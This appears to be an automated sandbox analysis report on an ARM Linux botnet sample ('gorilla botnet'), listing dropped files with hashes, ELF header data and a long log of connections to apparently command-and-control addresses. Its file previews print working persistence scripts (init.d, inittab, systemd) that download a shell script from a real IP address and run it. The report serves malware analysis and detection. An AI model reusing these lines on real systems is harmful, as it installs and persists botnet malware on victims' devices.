                                                                                SHA1:366833DD73EB88A0ADE32CE40C72FFD344C79EAE
                                                                                SHA-256:B0B69EA97C888838BAF6130D51DF729F39166D5E7EE2E6767DF3B470CA6C292A
                                                                                SHA-512:60B46735EC757453E7B7BC62AC157C809F15DD5F53FE3D83E193C1EDE7B577DF44C47E751FB150FDFF3197509A13B7BECFFAB33E9139BCBC2B592C2ACFBF68D7
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:#!/bin/sh.# /etc/init.d/na.elf..case "" in. start). echo 'Starting na.elf'. /tmp/na.elf &. wget http://154.216.19.140/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping na.elf'. killall na.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                Process:/tmp/na.elf
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):107
                                                                                Entropy (8bit):4.5540308421682365
                                                                                Encrypted:false
                                                                                SSDEEP:3:nAWu5vDFfoC2ROLUc/KILbaaFOdFXa5O:AZhorK/baaeXCO
                                                                                MD5:C3A1394BD7148FB23488F81079FF0D9B
                                                                                SHA1:4C45FFAE30999697E71EF8B9F2BB0B82A5D6DB91
                                                                                SHA-256:8DD1D48457FD462BFDB299EDE55C47A606EF68C76EF4AF45630203D25C812AC7
                                                                                SHA-512:753D410A2F468F5BAFF1E8264945337C992A45D6DBAD590FEC73A4E5C8748BF6BD4EAF7F6763E14F3A5DC59FAAB272BFEAE99E52E14E001FAED664FF75A19DBA
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:::respawn:/tmp/na.elf && wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                Process:/tmp/na.elf
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):53
                                                                                Entropy (8bit):3.871459242626451
                                                                                Encrypted:false
                                                                                SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                Process:/tmp/na.elf
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):98
                                                                                Entropy (8bit):4.4498574675536675
                                                                                Encrypted:false
                                                                                SSDEEP:3:TgBDFzSDRFbROLUc/KILbaaFOdFXa50:TgBNSXbK/baaeXC0
                                                                                MD5:381B95803A0F92D19A8D277779690D1F
                                                                                SHA1:9E83209F998066539E63C9DC054BCA616597370C
                                                                                SHA-256:B408272B3B8A937D42F4D03FC6E2E78564BC8EF8958676E8B8AA302DF404AB67
                                                                                SHA-512:61B8575D04FF6343D9EE4C8D69B520E64A02ACD9630794AB1958337F9CDE1726AFD2FC54F1F9C159EFCDC4CFD2D3FB55321764DE5D5615AED46F8A3952BE4E6C
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:/tmp/na.elf &.wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                Process:/tmp/na.elf
                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                Category:dropped
                                                                                Size (bytes):10
                                                                                Entropy (8bit):3.121928094887362
                                                                                Encrypted:false
                                                                                SSDEEP:3:TKH4vn:hv
                                                                                MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Joe Sandbox View:
                                                                                • Filename: dNBHFhYkoO.elf, Detection: malicious, Browse
                                                                                • Filename: HUWwCrf0mn.elf, Detection: malicious, Browse
                                                                                • Filename: 0aEXGHNxhO.elf, Detection: malicious, Browse
                                                                                • Filename: 7aodVUk6TV.elf, Detection: malicious, Browse
                                                                                • Filename: kj5f8keqNK.elf, Detection: malicious, Browse
                                                                                • Filename: arm7.nn.elf, Detection: malicious, Browse
                                                                                • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                                • Filename: arm5.nn.elf, Detection: malicious, Browse
                                                                                • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                • Filename: arm7.nn.elf, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:#!/bin/sh.
                                                                                Process:/tmp/na.elf
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):296
                                                                                Entropy (8bit):5.044455704377104
                                                                                Encrypted:false
                                                                                SSDEEP:6:z8ifitRZAMzdK+1A2+GWRdO4p+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+r+GWRdJp+GWRXY+GWRuL1I
                                                                                MD5:FABFC9513209E9EB17A91829BAAB6D42
                                                                                SHA1:ADDEAD1B4933DCC99E37D7CAA4619B51230E2BD1
                                                                                SHA-256:2819EFE4E9D7FF9DEDC30D1E7A0B0AB4B351CE0DFB67ADCB5595EA973F16515E
                                                                                SHA-512:421A864A966917E16A782457D26BCBD6E2460C15447895F8B8D1A86CE2C238E8AF75F7E4187D09A4D863067A79D9B4771A3FA0AAE651781CEAE31B3AD4D1720A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/na.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://154.216.19.140/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):76
                                                                                Entropy (8bit):3.7627880354948586
                                                                                Encrypted:false
                                                                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                Process:/tmp/na.elf
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):12
                                                                                Entropy (8bit):3.418295834054489
                                                                                Encrypted:false
                                                                                SSDEEP:3:TgBDln:TgB5
                                                                                MD5:951B267BD5360B4C3CA7BACED8A2634A
                                                                                SHA1:6BAC6446FDB84BF0060C4DA5ECB10F2C264B1F03
                                                                                SHA-256:8DD8E1A24B09832D24EDEC43CEF017CE5AAD2CB185367A22AE07A1055C70C6F8
                                                                                SHA-512:21F810040E835A5A8BE3614E8252009D92CDA9FAA2D22A34DFDDA15B07CF82171AA4B815BB6F023B2160071727CECF4FCDC09C6E3E6A5333CE11D22A010BEB10
                                                                                Malicious:false
                                                                                Preview:/tmp/na.elf.
                                                                                File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                Entropy (8bit):6.111512632068194
                                                                                TrID:
                                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                File name:na.elf
                                                                                File size:87'856 bytes
                                                                                MD5:d5fe73e8c423b96772a82449541e22c6
                                                                                SHA1:1560d25e99f594481bb8e259d9b99c71f445fdcd
                                                                                SHA256:9c8a7f11a9e88d4fad182d64e245ca604de3b01ec273f629423a43e682402e1b
                                                                                SHA512:ea6cd525f14faa4bff3a66ce07f54885da4777d88c5a46fd8c9745169881263402af81eefc66979981b66b5edbab66e658c0900a4fffc99f788e42e885161892
                                                                                SSDEEP:1536:N52ITA1+cXAlKxsXH6oIwc5GsJT7YEXUf2vNyo:N52I8cdMGsJxZNyo
                                                                                TLSH:09833A92B9815A13C6D522BBF67E028D372617B8D2DF721BCD22AF2133C695B0C77641
                                                                                File Content Preview:.ELF...a..........(.........4....U......4. ...(......................H...H...............P...P...P..`...T'..........Q.td..................................-...L."....I..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                ELF header

                                                                                Class:ELF32
                                                                                Data:2's complement, little endian
                                                                                Version:1 (current)
                                                                                Machine:ARM
                                                                                Version Number:0x1
                                                                                Type:EXEC (Executable file)
                                                                                OS/ABI:ARM - ABI
                                                                                ABI Version:0
                                                                                Entry Point Address:0x8190
                                                                                Flags:0x202
                                                                                ELF Header Size:52
                                                                                Program Header Offset:52
                                                                                Program Header Size:32
                                                                                Number of Program Headers:3
                                                                                Section Header Offset:87456
                                                                                Section Header Size:40
                                                                                Number of Section Headers:10
                                                                                Header String Table Index:9
                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                NULL0x00x00x00x00x0000
                                                                                .initPROGBITS0x80940x940x180x00x6AX004
                                                                                .textPROGBITS0x80b00xb00x124900x00x6AX0016
                                                                                .finiPROGBITS0x1a5400x125400x140x00x6AX004
                                                                                .rodataPROGBITS0x1a5540x125540x236c0x00x2A004
                                                                                .ctorsPROGBITS0x250000x150000x80x00x3WA004
                                                                                .dtorsPROGBITS0x250080x150080x80x00x3WA004
                                                                                .dataPROGBITS0x250140x150140x54c0x00x3WA004
                                                                                .bssNOBITS0x255600x155600x21f40x00x3WA004
                                                                                .shstrtabSTRTAB0x00x155600x3e0x00x0001
                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                LOAD0x00x80000x80000x148c00x148c06.19350x5R E0x8000.init .text .fini .rodata
                                                                                LOAD0x150000x250000x250000x5600x27545.02200x6RW 0x8000.ctors .dtors .data .bss
                                                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 11, 2024 10:44:57.416902065 CEST5997838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:44:57.421931982 CEST3824259978154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:44:57.422007084 CEST5997838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:44:57.422322989 CEST5997838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:44:57.427747965 CEST3824259978154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:44:57.962407112 CEST5997838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:44:57.967713118 CEST3824259978154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:44:57.967771053 CEST5997838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:44:58.966166973 CEST4100838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:44:58.971039057 CEST3824241008193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:44:58.971093893 CEST4100838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:44:58.971107006 CEST4100838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:44:58.976299047 CEST3824241008193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:44:59.208579063 CEST42836443192.168.2.2391.189.91.43
                                                                                Oct 11, 2024 10:44:59.493858099 CEST4100838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:44:59.532923937 CEST3824241008193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:44:59.533421040 CEST4100838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:00.488466024 CEST4251680192.168.2.23109.202.202.202
                                                                                Oct 11, 2024 10:45:00.503918886 CEST3883438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:00.508793116 CEST382423883487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:00.508851051 CEST3883438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:00.521174908 CEST3883438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:00.526262045 CEST382423883487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:01.060332060 CEST3883438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:01.076112032 CEST382423883487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:01.076200962 CEST3883438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:02.062323093 CEST5301638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:02.067312956 CEST3824253016185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:02.067399979 CEST5301638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:02.067399979 CEST5301638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:02.072410107 CEST3824253016185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:02.573914051 CEST5301638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:02.603147030 CEST3824253016185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:02.603328943 CEST5301638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:03.575311899 CEST5998638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:03.580421925 CEST3824259986154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:03.580487967 CEST5998638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:03.580508947 CEST5998638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:03.585526943 CEST3824259986154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:04.086272001 CEST5998638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:04.092411041 CEST3824259986154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:04.092466116 CEST5998638242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:05.087871075 CEST4101638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:05.092701912 CEST3824241016193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:05.092767954 CEST4101638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:05.092786074 CEST4101638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:05.097611904 CEST3824241016193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:05.598851919 CEST4101638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:05.629704952 CEST3824241016193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:05.629796028 CEST4101638242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:06.600402117 CEST3884238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:06.605566978 CEST382423884287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:06.605626106 CEST3884238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:06.605640888 CEST3884238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:06.610522032 CEST382423884287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:07.111547947 CEST3884238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:07.156754971 CEST382423884287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:07.172621965 CEST382423884287.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:07.172713995 CEST3884238242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:08.113152981 CEST5302438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:08.118207932 CEST3824253024185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:08.118385077 CEST5302438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:08.118431091 CEST5302438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:08.123423100 CEST3824253024185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:08.624947071 CEST5302438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:08.672646999 CEST3824253024185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:08.673274994 CEST3824253024185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:08.673352003 CEST5302438242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:09.626480103 CEST5999438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:09.631484985 CEST3824259994154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:09.631551027 CEST5999438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:09.631581068 CEST5999438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:09.636446953 CEST3824259994154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:10.137294054 CEST5999438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:10.143518925 CEST3824259994154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:10.143569946 CEST5999438242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:11.139285088 CEST4102438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:11.144279003 CEST3824241024193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:11.144396067 CEST4102438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:11.144418001 CEST4102438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:11.149329901 CEST3824241024193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:11.652285099 CEST4102438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:11.700756073 CEST3824241024193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:11.761703014 CEST3824241024193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:11.761967897 CEST4102438242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:12.654184103 CEST3885038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:12.659069061 CEST382423885087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:12.659167051 CEST3885038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:12.659205914 CEST3885038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:12.664309025 CEST382423885087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:13.166846991 CEST3885038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:13.216716051 CEST382423885087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:13.239799976 CEST382423885087.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:13.239913940 CEST3885038242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:14.169189930 CEST5303238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:14.174079895 CEST3824253032185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:14.174173117 CEST5303238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:14.174237967 CEST5303238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:14.179040909 CEST3824253032185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:14.310578108 CEST43928443192.168.2.2391.189.91.42
                                                                                Oct 11, 2024 10:45:14.682712078 CEST5303238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:14.709043980 CEST3824253032185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:14.709141016 CEST5303238242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:15.684508085 CEST6000238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:15.689506054 CEST3824260002154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:15.689569950 CEST6000238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:15.689569950 CEST6000238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:15.694389105 CEST3824260002154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:16.197778940 CEST6000238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:16.203154087 CEST3824260002154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:16.203228951 CEST6000238242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:17.200357914 CEST4103238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:17.314954996 CEST3824241032193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:17.315097094 CEST4103238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:17.315184116 CEST4103238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:17.320061922 CEST3824241032193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:17.822180986 CEST4103238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:17.872886896 CEST3824241032193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:17.880544901 CEST3824241032193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:17.880614996 CEST4103238242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:18.823869944 CEST3885838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:18.828743935 CEST382423885887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:18.828885078 CEST3885838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:18.828923941 CEST3885838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:18.833780050 CEST382423885887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:19.335606098 CEST3885838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:19.384800911 CEST382423885887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:19.406649113 CEST382423885887.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:19.406939983 CEST3885838242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:20.337913036 CEST5304038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:20.342921972 CEST3824253040185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:20.342988014 CEST5304038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:20.343022108 CEST5304038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:20.347945929 CEST3824253040185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:20.850333929 CEST5304038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:20.864830971 CEST3824253040185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:20.865056992 CEST5304038242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:21.853589058 CEST6001038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:22.009845018 CEST3824260010154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:22.010072947 CEST6001038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:22.010134935 CEST6001038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:22.015357018 CEST3824260010154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:22.519249916 CEST6001038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:22.528264046 CEST3824260010154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:22.528361082 CEST6001038242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:23.521898031 CEST4104038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:23.527906895 CEST3824241040193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:23.527987957 CEST4104038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:23.528063059 CEST4104038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:23.533400059 CEST3824241040193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:24.049108028 CEST4104038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:24.067163944 CEST3824241040193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:24.067219019 CEST4104038242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:25.051804066 CEST3886638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:25.056688070 CEST382423886687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:25.056740999 CEST3886638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:25.056768894 CEST3886638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:25.062041044 CEST382423886687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:25.567451954 CEST3886638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:25.613037109 CEST382423886687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:25.615267992 CEST382423886687.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:25.615420103 CEST3886638242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:26.569618940 CEST5304838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:26.575109005 CEST3824253048185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:26.575171947 CEST5304838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:26.575196981 CEST5304838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:26.580159903 CEST3824253048185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:26.596797943 CEST42836443192.168.2.2391.189.91.43
                                                                                Oct 11, 2024 10:45:27.082771063 CEST5304838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:27.128755093 CEST3824253048185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:27.137947083 CEST3824253048185.170.144.84192.168.2.23
                                                                                Oct 11, 2024 10:45:27.138030052 CEST5304838242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:28.085395098 CEST6001838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:28.090387106 CEST3824260018154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:28.090444088 CEST6001838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:28.090462923 CEST6001838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:28.095319986 CEST3824260018154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:28.600034952 CEST6001838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:28.605372906 CEST3824260018154.216.19.139192.168.2.23
                                                                                Oct 11, 2024 10:45:28.605431080 CEST6001838242192.168.2.23154.216.19.139
                                                                                Oct 11, 2024 10:45:29.602742910 CEST4104838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:29.607984066 CEST3824241048193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:29.608208895 CEST4104838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:29.608210087 CEST4104838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:29.613250017 CEST3824241048193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:30.119020939 CEST4104838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:30.162780046 CEST3824241048193.143.1.59192.168.2.23
                                                                                Oct 11, 2024 10:45:30.162858963 CEST4104838242192.168.2.23193.143.1.59
                                                                                Oct 11, 2024 10:45:30.692234993 CEST4251680192.168.2.23109.202.202.202
                                                                                Oct 11, 2024 10:45:31.121203899 CEST3887438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:31.126174927 CEST382423887487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:31.126251936 CEST3887438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:31.126303911 CEST3887438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:31.131714106 CEST382423887487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:31.634567022 CEST3887438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:31.681247950 CEST382423887487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:31.691284895 CEST382423887487.120.84.105192.168.2.23
                                                                                Oct 11, 2024 10:45:31.691535950 CEST3887438242192.168.2.2387.120.84.105
                                                                                Oct 11, 2024 10:45:32.636953115 CEST5305638242192.168.2.23185.170.144.84
                                                                                Oct 11, 2024 10:45:32.642281055 CEST3824253056185.170.144.84192.168.2.23
